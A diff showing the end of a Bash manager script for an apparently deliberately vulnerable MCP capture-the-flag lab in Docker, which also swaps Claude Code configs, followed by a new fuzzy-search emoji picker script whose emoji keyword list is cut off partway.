|
||||||
|
|
||||||
|
if docker build -t "$IMAGE" . ; then
|
||||||
|
echo -e "${GREEN}✓${NC} DVMCP image built successfully"
|
||||||
|
echo -e "${CYAN}[*]${NC} You can now run: ${BOLD}dvmcp start${NC}"
|
||||||
|
else
|
||||||
|
echo -e "${RED}✗${NC} Build failed"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
start_dvmcp() {
|
||||||
|
# Check if image exists
|
||||||
|
if ! check_image_exists; then
|
||||||
|
echo -e "${RED}Error:${NC} DVMCP image not found"
|
||||||
|
echo -e "${YELLOW}Run:${NC} ${BOLD}dvmcp build${NC} first"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Swap to CTF config BEFORE starting container
|
||||||
|
swap_to_ctf_config
|
||||||
|
echo
|
||||||
|
|
||||||
|
if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} DVMCP already running"
|
||||||
|
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:9001-9010${NC}"
|
||||||
|
return 0
|
||||||
|
else
|
||||||
|
echo -e "${CYAN}[*]${NC} Starting existing container..."
|
||||||
|
docker start "$CONTAINER_NAME"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo -e "${CYAN}[*]${NC} Starting DVMCP server..."
|
||||||
|
echo -e "${YELLOW}Note:${NC} Mapping ports 9001-9010 for challenge instances"
|
||||||
|
docker run -d --name "$CONTAINER_NAME" \
|
||||||
|
-p 9001:9001 \
|
||||||
|
-p 9002:9002 \
|
||||||
|
-p 9003:9003 \
|
||||||
|
-p 9004:9004 \
|
||||||
|
-p 9005:9005 \
|
||||||
|
-p 9006:9006 \
|
||||||
|
-p 9007:9007 \
|
||||||
|
-p 9008:9008 \
|
||||||
|
-p 9009:9009 \
|
||||||
|
-p 9010:9010 \
|
||||||
|
"$IMAGE"
|
||||||
|
fi
|
||||||
|
|
||||||
|
sleep 3
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} DVMCP server started"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}Challenge Instances:${NC}"
|
||||||
|
echo -e " ${CYAN}Port 9001:${NC} http://localhost:9001"
|
||||||
|
echo -e " ${CYAN}Port 9002:${NC} http://localhost:9002"
|
||||||
|
echo -e " ${CYAN}Port 9003:${NC} http://localhost:9003"
|
||||||
|
echo -e " ${CYAN}Port 9004:${NC} http://localhost:9004"
|
||||||
|
echo -e " ${CYAN}Port 9005:${NC} http://localhost:9005"
|
||||||
|
echo -e " ${CYAN}Port 9006:${NC} http://localhost:9006"
|
||||||
|
echo -e " ${CYAN}Port 9007:${NC} http://localhost:9007"
|
||||||
|
echo -e " ${CYAN}Port 9008:${NC} http://localhost:9008"
|
||||||
|
echo -e " ${CYAN}Port 9009:${NC} http://localhost:9009"
|
||||||
|
echo -e " ${CYAN}Port 9010:${NC} http://localhost:9010"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}Tip:${NC} Test with: ${BOLD}curl http://localhost:9001${NC}"
|
||||||
|
echo -e "${YELLOW}Security:${NC} ${GREEN}Production MCP servers isolated${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}⚠ IMPORTANT:${NC} Restart Claude Code to load CTF config"
|
||||||
|
}
|
||||||
|
|
||||||
|
stop_dvmcp() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
echo -e "${CYAN}[*]${NC} Stopping DVMCP server..."
|
||||||
|
docker stop "$CONTAINER_NAME"
|
||||||
|
echo -e "${GREEN}✓${NC} DVMCP server stopped"
|
||||||
|
else
|
||||||
|
echo -e "${YELLOW}⚠${NC} DVMCP not running"
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Restore production config AFTER stopping container
|
||||||
|
echo
|
||||||
|
restore_prod_config
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}⚠ IMPORTANT:${NC} Restart Claude Code to load production config"
|
||||||
|
}
|
||||||
|
|
||||||
|
restart_dvmcp() {
|
||||||
|
stop_dvmcp
|
||||||
|
sleep 2
|
||||||
|
start_dvmcp
|
||||||
|
}
|
||||||
|
|
||||||
|
show_status() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
echo -e "${GREEN}●${NC} DVMCP server is ${GREEN}running${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}Active Ports:${NC}"
|
||||||
|
docker port "$CONTAINER_NAME" 2>/dev/null | while IFS= read -r line; do
|
||||||
|
echo -e " ${CYAN}${line}${NC}"
|
||||||
|
done
|
||||||
|
echo
|
||||||
|
docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
|
||||||
|
else
|
||||||
|
echo -e "${RED}●${NC} DVMCP server is ${RED}stopped${NC}"
|
||||||
|
|
||||||
|
if ! check_image_exists; then
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}Note:${NC} Image not built yet. Run: ${BOLD}dvmcp build${NC}"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}Config Status:${NC}"
|
||||||
|
if [[ -f "$CONFIG_STATE_FILE" ]]; then
|
||||||
|
echo -e " ${CYAN}Mode:${NC} CTF (isolated)"
|
||||||
|
echo -e " ${CYAN}Active:${NC} ${CTF_CONFIG}"
|
||||||
|
echo -e " ${CYAN}Backup:${NC} ${BACKUP_CONFIG}"
|
||||||
|
else
|
||||||
|
echo -e " ${CYAN}Mode:${NC} Production"
|
||||||
|
echo -e " ${CYAN}Active:${NC} ${PROD_CONFIG}"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
show_logs() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
docker logs -f "$CONTAINER_NAME"
|
||||||
|
else
|
||||||
|
echo -e "${RED}Error:${NC} DVMCP server not running"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
open_shell() {
|
||||||
|
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||||
|
echo -e "${CYAN}[*]${NC} Opening shell in DVMCP container..."
|
||||||
|
docker exec -it "$CONTAINER_NAME" /bin/bash || docker exec -it "$CONTAINER_NAME" /bin/sh
|
||||||
|
else
|
||||||
|
echo -e "${RED}Error:${NC} DVMCP server not running"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main
|
||||||
|
check_docker
|
||||||
|
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
case "$1" in
|
||||||
|
build)
|
||||||
|
build_dvmcp
|
||||||
|
;;
|
||||||
|
start|up)
|
||||||
|
start_dvmcp
|
||||||
|
;;
|
||||||
|
stop|down)
|
||||||
|
stop_dvmcp
|
||||||
|
;;
|
||||||
|
restart)
|
||||||
|
restart_dvmcp
|
||||||
|
;;
|
||||||
|
status)
|
||||||
|
show_status
|
||||||
|
;;
|
||||||
|
logs)
|
||||||
|
show_logs
|
||||||
|
;;
|
||||||
|
shell|sh|bash)
|
||||||
|
open_shell
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo -e "${RED}Error:${NC} Unknown command: $1"
|
||||||
|
echo "Run 'dvmcp --help' for usage"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
552
scripts/emoji
Executable file
552
scripts/emoji
Executable file
|
|
@ -0,0 +1,552 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: emoji
|
||||||
|
# Description: Interactive emoji picker with fuzzy search
|
||||||
|
# Source: Inspired by https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
# Usage: emoji # interactive picker
|
||||||
|
# emoji smile # search for "smile"
|
||||||
|
|
||||||
|
# Curated emoji database (emoji + keywords)
|
||||||
|
emojis="😀 grinning face grin happy smile teeth cheerful
|
||||||
|
😃 smiley smile happy face open mouth teeth yay
|
||||||
|
😄 smile happy face grin laugh grinning eyes closed
|
||||||
|
😁 beaming smile happy grin teeth eyes closed
|
||||||
|
😆 laughing haha hahaha lol rofl laugh grinning squinting
|
||||||
|
😅 grinning sweat relief phew close call nervous laugh
|
||||||
|
🤣 rolling floor rofl laugh crying funny hilarious
|
||||||
|
😂 tears joy laugh cry funny lol crying
|
||||||
|
🙂 slightly smiling smile happy nice
|
||||||
|
🙃 upside down smile sarcastic silly
|
||||||
|
😉 wink flirt winky playful tease
|
||||||
|
😊 smiling eyes smile happy blush shy
|
||||||
|
😇 smiling halo angel innocent saint good
|
||||||
|
🥰 smiling hearts love adore crush hearts eyes
|
||||||
|
😍 heart eyes love crush hearts smiling loving
|
||||||
|
🤩 star eyes starstruck excited wow amazed
|
||||||
|
😘 blowing kiss love smooch mwah
|
||||||
|
😗 kissing smile kiss puckered
|
||||||
|
☺️ smiling face blushing happy relaxed
|
||||||
|
😚 kissing closed eyes kiss affection
|
||||||
|
😙 kissing smiling eyes kiss happy
|
||||||
|
🥲 smiling tear touched grateful sad happy bittersweet
|
||||||
|
😋 yummy delicious tasty savoring food yum
|
||||||
|
😛 tongue playful silly teasing
|
||||||
|
😜 winking tongue playful teasing kidding
|
||||||
|
🤪 zany crazy wild silly wacky goofy
|
||||||
|
😝 squinting tongue playful teasing horrible taste
|
||||||
|
🤑 money mouth dollar rich greedy cash
|
||||||
|
🤗 hugging hug embrace care support
|
||||||
|
🤭 hand mouth oops giggle secret tee hee
|
||||||
|
🫢 eyes hand peeking surprised shocked
|
||||||
|
🫣 peeking through fingers scared peek boo hide
|
||||||
|
🤫 shushing shh quiet secret silence hush
|
||||||
|
🤔 thinking hmm wonder ponder contemplative
|
||||||
|
🫡 salute respect military yes sir
|
||||||
|
🤐 zipper mouth secret sealed silent quiet
|
||||||
|
🤨 raised eyebrow skeptical suspicious doubt questioning
|
||||||
|
😐 neutral face blank expressionless meh
|
||||||
|
😑 expressionless annoyed blank dead inside
|
||||||
|
😶 no mouth quiet silent speechless
|
||||||
|
🫥 dotted line invisible disappearing transparent
|
||||||
|
😶🌫️ face clouds confused foggy unclear
|
||||||
|
😏 smirking smirk sly confident knowing
|
||||||
|
😒 unamused annoyed unimpressed disappointed meh
|
||||||
|
🙄 rolling eyes annoyed duh whatever sarcastic
|
||||||
|
😬 grimacing awkward uncomfortable eek cringe teeth
|
||||||
|
😮💨 exhaling sigh relief phew tired
|
||||||
|
🤥 lying pinocchio lie nose growing
|
||||||
|
🫨 shaking vibrating earthquake scared nervous
|
||||||
|
😌 relieved calm peaceful content relaxed
|
||||||
|
😔 pensive sad disappointed dejected down
|
||||||
|
😪 sleepy tired yawn exhausted drowsy
|
||||||
|
🤤 drooling hungry desire want covet
|
||||||
|
😴 sleeping sleep zzz asleep tired snooze
|
||||||
|
😷 face mask sick ill medical doctor protection
|
||||||
|
🤒 thermometer sick ill fever temperature
|
||||||
|
🤕 head bandage hurt injured wounded ow
|
||||||
|
🤢 nauseated sick queasy gross disgusted
|
||||||
|
🤮 vomiting puke sick throw up barf
|
||||||
|
🤧 sneezing gesundheit achoo sick cold allergies
|
||||||
|
🥵 hot face heat sweating fever burning
|
||||||
|
🥶 cold face freezing frozen ice chilly
|
||||||
|
🥴 woozy dizzy drunk tipsy disoriented confused
|
||||||
|
😵 dizzy face knocked out stunned shocked
|
||||||
|
😵💫 spiral eyes dizzy hypnotized dazed confused
|
||||||
|
🤯 exploding head mind blown shocked amazed
|
||||||
|
🤠 cowboy hat yee haw western
|
||||||
|
🥳 party celebrating birthday festive celebration confetti
|
||||||
|
🥸 disguise glasses nose mustache incognito spy
|
||||||
|
😎 sunglasses cool awesome rad shades
|
||||||
|
🤓 nerd geek smart glasses studious
|
||||||
|
🧐 monocle fancy classy rich thinking posh
|
||||||
|
😕 confused puzzled uncertain huh what
|
||||||
|
🫤 diagonal mouth meh unsure uncertain
|
||||||
|
😟 worried anxious concerned nervous afraid
|
||||||
|
🙁 slightly frowning sad disappointed unhappy
|
||||||
|
☹️ frowning sad upset disappointed down
|
||||||
|
😮 open mouth shocked surprised wow oh
|
||||||
|
😯 hushed surprised quiet wow shocked
|
||||||
|
😲 astonished shocked amazed surprised stunned gasping
|
||||||
|
😳 flushed embarrassed shy blush awkward
|
||||||
|
🥺 pleading puppy eyes begging please sad mercy
|
||||||
|
🥹 holding tears grateful touched emotional moved
|
||||||
|
😦 frowning open mouth shocked worried concerned
|
||||||
|
😧 anguished distressed worried scared oh no
|
||||||
|
😨 fearful scared afraid anxious fear
|
||||||
|
😰 anxious sweat nervous worried stressed cold sweat
|
||||||
|
😥 sad relieved phew sweat disappointed but relieved
|
||||||
|
😢 crying sad tear upset depressed
|
||||||
|
😭 loudly crying sobbing bawling devastated
|
||||||
|
😱 screaming fear shocked scared horrified scream
|
||||||
|
😖 confounded frustrated scrunched upset confused
|
||||||
|
😣 persevering struggling persevere powering through
|
||||||
|
😞 disappointed sad unhappy let down dejected
|
||||||
|
😓 downcast sweat sad worried stressed defeated
|
||||||
|
😩 weary exhausted tired fed up frustrated
|
||||||
|
😫 tired exhausted fed up frustrated stressed
|
||||||
|
🥱 yawning tired bored sleepy boring exhausted
|
||||||
|
😤 triumph victory proud won huffing
|
||||||
|
😡 angry mad furious enraged pouting
|
||||||
|
😠 angry mad annoyed frustrated upset
|
||||||
|
🤬 cursing swearing profanity symbols angry fuck
|
||||||
|
😈 smiling horns devil mischievous naughty evil
|
||||||
|
👿 angry horns devil mad evil angry purple
|
||||||
|
💀 skull dead death dying funny died
|
||||||
|
☠️ skull crossbones poison danger pirate deadly
|
||||||
|
💩 pile poo poop shit turd crap
|
||||||
|
🤡 clown joker funny creepy circus
|
||||||
|
👹 ogre monster oni demon red scary
|
||||||
|
👺 goblin monster oni demon tengu red nose
|
||||||
|
👻 ghost boo spooky halloween phantom
|
||||||
|
👽 alien extraterrestrial et space ufo
|
||||||
|
👾 alien monster space invader video game retro
|
||||||
|
🤖 robot bot ai machine automation
|
||||||
|
😺 grinning cat happy cat smiling feline
|
||||||
|
😸 grinning cat smiling eyes happy feline
|
||||||
|
😹 cat tears joy laughing funny cat
|
||||||
|
😻 cat heart eyes love smiling adore
|
||||||
|
😼 cat wry smile smirking sly cat
|
||||||
|
😽 kissing cat love kiss affection
|
||||||
|
🙀 weary cat surprised shocked scared screaming
|
||||||
|
😿 crying cat sad tear upset
|
||||||
|
😾 pouting cat angry grumpy annoyed mad
|
||||||
|
🙈 see no evil monkey blind ignore cover eyes
|
||||||
|
🙉 hear no evil monkey deaf ignore cover ears
|
||||||
|
🙊 speak no evil monkey silence quiet shh cover mouth
|
||||||
|
💋 kiss lips kissing love smooch
|
||||||
|
💌 love letter heart mail valentine romance
|
||||||
|
💘 heart arrow cupid love valentine romance
|
||||||
|
💝 heart ribbon gift present love valentine
|
||||||
|
💖 sparkling heart love sparkle shine
|
||||||
|
💗 growing heart love expanding bigger
|
||||||
|
💓 beating heart love heartbeat pulse
|
||||||
|
💞 revolving hearts love two hearts circling
|
||||||
|
💕 two hearts love romance pair couple
|
||||||
|
💟 heart decoration love ornament purple white
|
||||||
|
❣️ heart exclamation love emphasis
|
||||||
|
💔 broken heart heartbreak sad breakup hurt
|
||||||
|
❤️🔥 heart fire burning love passion flames
|
||||||
|
❤️🩹 mending heart healing recovery bandaged
|
||||||
|
❤️ red heart love valentine romance classic
|
||||||
|
🩷 pink heart love soft cute gentle
|
||||||
|
🧡 orange heart love friendship care
|
||||||
|
💛 yellow heart love happiness friendship
|
||||||
|
💚 green heart love nature jealous
|
||||||
|
💙 blue heart love trust calm loyal
|
||||||
|
🩵 light blue heart love peace calm soft
|
||||||
|
💜 purple heart love compassion sensitivity
|
||||||
|
🤎 brown heart love earth natural
|
||||||
|
🖤 black heart dark sad evil goth
|
||||||
|
🩶 grey heart love neutral indifferent
|
||||||
|
🤍 white heart love pure clean innocent
|
||||||
|
💯 hundred perfect 100 score full keep it 💯
|
||||||
|
💢 anger symbol mad angry frustrated
|
||||||
|
💥 collision bang boom crash pow explosion
|
||||||
|
💫 dizzy stars sparkles dazed seeing stars
|
||||||
|
💦 sweat droplets water splash wet
|
||||||
|
💨 dashing dash wind fast smoke puff gone
|
||||||
|
🕳️ hole pit gap void empty opening
|
||||||
|
💬 speech balloon talk chat speaking
|
||||||
|
👁️🗨️ eye speech bubble witness i see attention
|
||||||
|
🗨️ left speech bubble chat talk dialog
|
||||||
|
🗯️ right anger bubble mad shout yell
|
||||||
|
💭 thought balloon thinking wondering daydream
|
||||||
|
💤 zzz sleeping sleep snore tired
|
||||||
|
👋 waving hand hi hello goodbye wave bye
|
||||||
|
🤚 raised back hand stop wait hold on
|
||||||
|
🖐️ hand fingers splayed five stop high five
|
||||||
|
✋ raised hand stop halt wait high five
|
||||||
|
🖖 vulcan salute spock star trek live long prosper
|
||||||
|
🫱 rightwards hand pointing right offer
|
||||||
|
🫲 leftwards hand pointing left offer
|
||||||
|
🫳 palm down hand drop dismiss
|
||||||
|
🫴 palm up hand offering receive give
|
||||||
|
🫷 leftwards pushing hand stop reject push
|
||||||
|
🫸 rightwards pushing hand stop reject push
|
||||||
|
👌 ok hand okay perfect good chef kiss
|
||||||
|
🤌 pinched fingers italian gesture what
|
||||||
|
🤏 pinching hand tiny small little bit
|
||||||
|
✌️ victory hand peace sign v two
|
||||||
|
🤞 crossed fingers luck wish hope good luck
|
||||||
|
🫰 hand index thumb snap click money pay
|
||||||
|
🤟 love you hand sign i love you
|
||||||
|
🤘 sign horns rock metal devil horns
|
||||||
|
🤙 call me hand phone shaka hang loose
|
||||||
|
👈 backhand index pointing left left that
|
||||||
|
👉 backhand index pointing right right that
|
||||||
|
👆 backhand index pointing up up above that
|
||||||
|
🖕 middle finger fuck you rude profanity flip off
|
||||||
|
👇 backhand index pointing down down below that
|
||||||
|
☝️ index pointing up one attention above
|
||||||
|
🫵 index pointing you your attention
|
||||||
|
👍 thumbs up good yes like approve agree
|
||||||
|
👎 thumbs down bad no dislike disapprove disagree
|
||||||
|
✊ raised fist power solidarity resistance punch
|
||||||
|
👊 oncoming fist punch bump fist bump bro
|
||||||
|
🤛 left facing fist punch bump fist bump
|
||||||
|
🤜 right facing fist punch bump fist bump
|
||||||
|
👏 clapping hands applause clap bravo good job
|
||||||
|
🙌 raising hands celebration praise yay hooray hallelujah
|
||||||
|
🫶 heart hands love support care fingers
|
||||||
|
👐 open hands hug embrace jazz hands
|
||||||
|
🤲 palms together pray please namaste dua
|
||||||
|
🤝 handshake deal agreement hello meeting shake
|
||||||
|
🙏 folded hands pray thank you please thanks namaste
|
||||||
|
✍️ writing hand writing write author pen
|
||||||
|
💅 nail polish nails beauty makeup manicure slay
|
||||||
|
🤳 selfie camera photo picture self portrait
|
||||||
|
💪 flexed biceps strong muscle strength flex gym
|
||||||
|
🦾 mechanical arm prosthetic cyborg robot strong
|
||||||
|
🦿 mechanical leg prosthetic cyborg robot
|
||||||
|
🦵 leg kick limb
|
||||||
|
🦶 foot step kick toe
|
||||||
|
👂 ear hearing listen sound
|
||||||
|
🦻 ear hearing aid deaf listen
|
||||||
|
👃 nose smell sniff scent
|
||||||
|
🧠 brain smart intelligent think mind
|
||||||
|
🫀 anatomical heart real heart organ medical
|
||||||
|
🫁 lungs breathing respiratory organ medical
|
||||||
|
🦷 tooth teeth dentist dental smile
|
||||||
|
🦴 bone skeleton fossil
|
||||||
|
👀 eyes looking watching see stare observe
|
||||||
|
👁️ eye looking watching see vision
|
||||||
|
👅 tongue lick taste silly
|
||||||
|
👄 mouth lips kiss kissing speaking
|
||||||
|
🫦 biting lip nervous anxious flirting
|
||||||
|
👶 baby infant newborn child young
|
||||||
|
🧒 child kid young boy girl
|
||||||
|
👦 boy child kid young male
|
||||||
|
👧 girl child kid young female
|
||||||
|
🧑 person human adult gender neutral
|
||||||
|
👱 blond person blonde hair fair
|
||||||
|
👨 man male adult guy dude gentleman
|
||||||
|
🧔 bearded person beard facial hair
|
||||||
|
🧔♂️ man beard facial hair
|
||||||
|
🧔♀️ woman beard facial hair
|
||||||
|
👨🦰 man red hair ginger
|
||||||
|
👨🦱 man curly hair
|
||||||
|
👨🦳 man white hair old elderly
|
||||||
|
👨🦲 man bald no hair
|
||||||
|
👩 woman female adult lady
|
||||||
|
👩🦰 woman red hair ginger
|
||||||
|
👩🦱 woman curly hair
|
||||||
|
👩🦳 woman white hair old elderly
|
||||||
|
👩🦲 woman bald no hair
|
||||||
|
🧓 older adult elderly senior old
|
||||||
|
👴 old man elderly grandfather senior
|
||||||
|
👵 old woman elderly grandmother senior
|
||||||
|
🙍 person frowning sad upset disappointed
|
||||||
|
🙍♂️ man frowning sad upset
|
||||||
|
🙍♀️ woman frowning sad upset
|
||||||
|
🙎 person pouting angry mad annoyed
|
||||||
|
🙎♂️ man pouting angry mad
|
||||||
|
🙎♀️ woman pouting angry mad
|
||||||
|
🙅 person gesturing no nope stop
|
||||||
|
🙅♂️ man gesturing no nope stop
|
||||||
|
🙅♀️ woman gesturing no nope stop
|
||||||
|
🙆 person gesturing ok okay yes
|
||||||
|
🙆♂️ man gesturing ok okay yes
|
||||||
|
🙆♀️ woman gesturing ok okay yes
|
||||||
|
💁 person tipping hand information sass
|
||||||
|
💁♂️ man tipping hand information
|
||||||
|
💁♀️ woman tipping hand information sass
|
||||||
|
🙋 person raising hand question attention pick me
|
||||||
|
🙋♂️ man raising hand question
|
||||||
|
🙋♀️ woman raising hand question
|
||||||
|
🧏 deaf person sign language deaf
|
||||||
|
🧏♂️ deaf man sign language
|
||||||
|
🧏♀️ deaf woman sign language
|
||||||
|
🙇 person bowing sorry thank you respect
|
||||||
|
🙇♂️ man bowing sorry respect
|
||||||
|
🙇♀️ woman bowing sorry respect
|
||||||
|
🤦 person facepalming facepalm frustrated duh disappointed
|
||||||
|
🤦♂️ man facepalming facepalm frustrated
|
||||||
|
🤦♀️ woman facepalming facepalm frustrated
|
||||||
|
🤷 person shrugging idk dunno shrug don't know whatever
|
||||||
|
🤷♂️ man shrugging idk dunno
|
||||||
|
🤷♀️ woman shrugging idk dunno
|
||||||
|
🧑⚕️ health worker doctor nurse medical
|
||||||
|
👨⚕️ man health worker doctor
|
||||||
|
👩⚕️ woman health worker doctor nurse
|
||||||
|
🧑🎓 student school college university
|
||||||
|
👨🎓 man student graduate
|
||||||
|
👩🎓 woman student graduate
|
||||||
|
🧑🏫 teacher professor educator
|
||||||
|
👨🏫 man teacher professor
|
||||||
|
👩🏫 woman teacher professor
|
||||||
|
🧑⚖️ judge law legal court justice
|
||||||
|
👨⚖️ man judge law
|
||||||
|
👩⚖️ woman judge law
|
||||||
|
🧑🌾 farmer agriculture crops
|
||||||
|
👨🌾 man farmer agriculture
|
||||||
|
👩🌾 woman farmer agriculture
|
||||||
|
🧑🍳 cook chef cooking
|
||||||
|
👨🍳 man cook chef
|
||||||
|
👩🍳 woman cook chef
|
||||||
|
🧑🔧 mechanic technician repair
|
||||||
|
👨🔧 man mechanic technician
|
||||||
|
👩🔧 woman mechanic technician
|
||||||
|
🧑🏭 factory worker industrial
|
||||||
|
👨🏭 man factory worker
|
||||||
|
👩🏭 woman factory worker
|
||||||
|
🧑💼 office worker business professional
|
||||||
|
👨💼 man office worker business
|
||||||
|
👩💼 woman office worker business
|
||||||
|
🧑🔬 scientist research lab
|
||||||
|
👨🔬 man scientist research
|
||||||
|
👩🔬 woman scientist research
|
||||||
|
🧑💻 technologist developer programmer coder hacker computer
|
||||||
|
👨💻 man technologist developer programmer
|
||||||
|
👩💻 woman technologist developer programmer
|
||||||
|
🧑🎤 singer performer music artist
|
||||||
|
👨🎤 man singer rockstar
|
||||||
|
👩🎤 woman singer rockstar
|
||||||
|
🧑🎨 artist painter creative
|
||||||
|
👨🎨 man artist painter
|
||||||
|
👩🎨 woman artist painter
|
||||||
|
🧑✈️ pilot aviation plane flight
|
||||||
|
👨✈️ man pilot aviation
|
||||||
|
👩✈️ woman pilot aviation
|
||||||
|
🧑🚀 astronaut space cosmonaut
|
||||||
|
👨🚀 man astronaut space
|
||||||
|
👩🚀 woman astronaut space
|
||||||
|
🧑🚒 firefighter fire emergency
|
||||||
|
👨🚒 man firefighter fire
|
||||||
|
👩🚒 woman firefighter fire
|
||||||
|
👮 police officer cop law enforcement
|
||||||
|
👮♂️ man police officer cop
|
||||||
|
👮♀️ woman police officer cop
|
||||||
|
🕵️ detective spy investigator sleuth
|
||||||
|
🕵️♂️ man detective spy
|
||||||
|
🕵️♀️ woman detective spy
|
||||||
|
💂 guard soldier royal british
|
||||||
|
💂♂️ man guard soldier
|
||||||
|
💂♀️ woman guard soldier
|
||||||
|
🥷 ninja stealth assassin martial arts
|
||||||
|
👷 construction worker builder hard hat
|
||||||
|
👷♂️ man construction worker builder
|
||||||
|
👷♀️ woman construction worker builder
|
||||||
|
🫅 person crown royalty monarch king queen
|
||||||
|
🤴 prince royalty nobility fairy tale
|
||||||
|
👸 princess royalty nobility fairy tale
|
||||||
|
👳 person turban wearing turban
|
||||||
|
👳♂️ man turban wearing
|
||||||
|
👳♀️ woman turban wearing
|
||||||
|
👲 person skullcap cap hat chinese
|
||||||
|
🧕 woman headscarf hijab muslim
|
||||||
|
🤵 person tuxedo formal wedding groom
|
||||||
|
🤵♂️ man tuxedo formal groom
|
||||||
|
🤵♀️ woman tuxedo formal
|
||||||
|
👰 person veil wedding bride marriage
|
||||||
|
👰♂️ man veil wedding groom
|
||||||
|
👰♀️ woman veil wedding bride
|
||||||
|
🤰 pregnant woman expecting baby
|
||||||
|
🫃 pregnant man trans expecting
|
||||||
|
🫄 pregnant person expecting baby
|
||||||
|
👼 baby angel cherub halo innocent
|
||||||
|
🎅 santa claus christmas saint nick father christmas
|
||||||
|
🤶 mrs claus christmas mother
|
||||||
|
🧑🎄 mx claus christmas gender neutral
|
||||||
|
🦸 superhero hero power super cape
|
||||||
|
🦸♂️ man superhero hero
|
||||||
|
🦸♀️ woman superhero hero
|
||||||
|
🦹 supervillain villain evil bad
|
||||||
|
🦹♂️ man supervillain villain
|
||||||
|
🦹♀️ woman supervillain villain
|
||||||
|
🧙 mage wizard witch magic sorcerer
|
||||||
|
🧙♂️ man mage wizard sorcerer
|
||||||
|
🧙♀️ woman mage witch sorceress
|
||||||
|
🧚 fairy magic pixie sprite wings
|
||||||
|
🧚♂️ man fairy magic
|
||||||
|
🧚♀️ woman fairy magic pixie
|
||||||
|
🧛 vampire dracula undead fangs blood
|
||||||
|
🧛♂️ man vampire dracula
|
||||||
|
🧛♀️ woman vampire dracula
|
||||||
|
🧜 merperson mermaid merman ocean sea
|
||||||
|
🧜♂️ merman triton ocean
|
||||||
|
🧜♀️ mermaid ariel ocean
|
||||||
|
🧝 elf fantasy magic legolas
|
||||||
|
🧝♂️ man elf fantasy
|
||||||
|
🧝♀️ woman elf fantasy
|
||||||
|
🧞 genie magic wish lamp djinn
|
||||||
|
🧞♂️ man genie magic
|
||||||
|
🧞♀️ woman genie magic
|
||||||
|
🧟 zombie undead walker brain dead
|
||||||
|
🧟♂️ man zombie undead
|
||||||
|
🧟♀️ woman zombie undead
|
||||||
|
🧌 troll internet monster ugly
|
||||||
|
💆 person getting massage spa relaxation
|
||||||
|
💆♂️ man getting massage spa
|
||||||
|
💆♀️ woman getting massage spa
|
||||||
|
💇 person getting haircut salon barber
|
||||||
|
💇♂️ man getting haircut barber
|
||||||
|
💇♀️ woman getting haircut salon
|
||||||
|
🚶 person walking walk stroll
|
||||||
|
🚶♂️ man walking walk
|
||||||
|
🚶♀️ woman walking walk
|
||||||
|
🧍 person standing stand up
|
||||||
|
🧍♂️ man standing stand
|
||||||
|
🧍♀️ woman standing stand
|
||||||
|
🧎 person kneeling kneel pray
|
||||||
|
🧎♂️ man kneeling kneel
|
||||||
|
🧎♀️ woman kneeling kneel
|
||||||
|
🧑🦯 person white cane blind visually impaired
|
||||||
|
👨🦯 man white cane blind
|
||||||
|
👩🦯 woman white cane blind
|
||||||
|
🧑🦼 person motorized wheelchair disabled
|
||||||
|
👨🦼 man motorized wheelchair disabled
|
||||||
|
👩🦼 woman motorized wheelchair disabled
|
||||||
|
🧑🦽 person manual wheelchair disabled
|
||||||
|
👨🦽 man manual wheelchair disabled
|
||||||
|
👩🦽 woman manual wheelchair disabled
|
||||||
|
🏃 person running run jog exercise sprint
|
||||||
|
🏃♂️ man running run jog
|
||||||
|
🏃♀️ woman running run jog
|
||||||
|
💃 woman dancing dance party salsa
|
||||||
|
🕺 man dancing dance party disco
|
||||||
|
🕴️ person suit levitating floating hovering
|
||||||
|
👯 people bunny ears party dancers
|
||||||
|
👯♂️ men bunny ears party
|
||||||
|
👯♀️ women bunny ears party
|
||||||
|
🧖 person steamy room sauna spa steam
|
||||||
|
🧖♂️ man steamy room sauna
|
||||||
|
🧖♀️ woman steamy room sauna
|
||||||
|
🧗 person climbing climb rock climbing
|
||||||
|
🧗♂️ man climbing climb
|
||||||
|
🧗♀️ woman climbing climb
|
||||||
|
🤺 person fencing sword sport
|
||||||
|
🏇 horse racing jockey racing equestrian
|
||||||
|
⛷️ skier skiing snow winter sport
|
||||||
|
🏂 snowboarder snowboarding snow winter
|
||||||
|
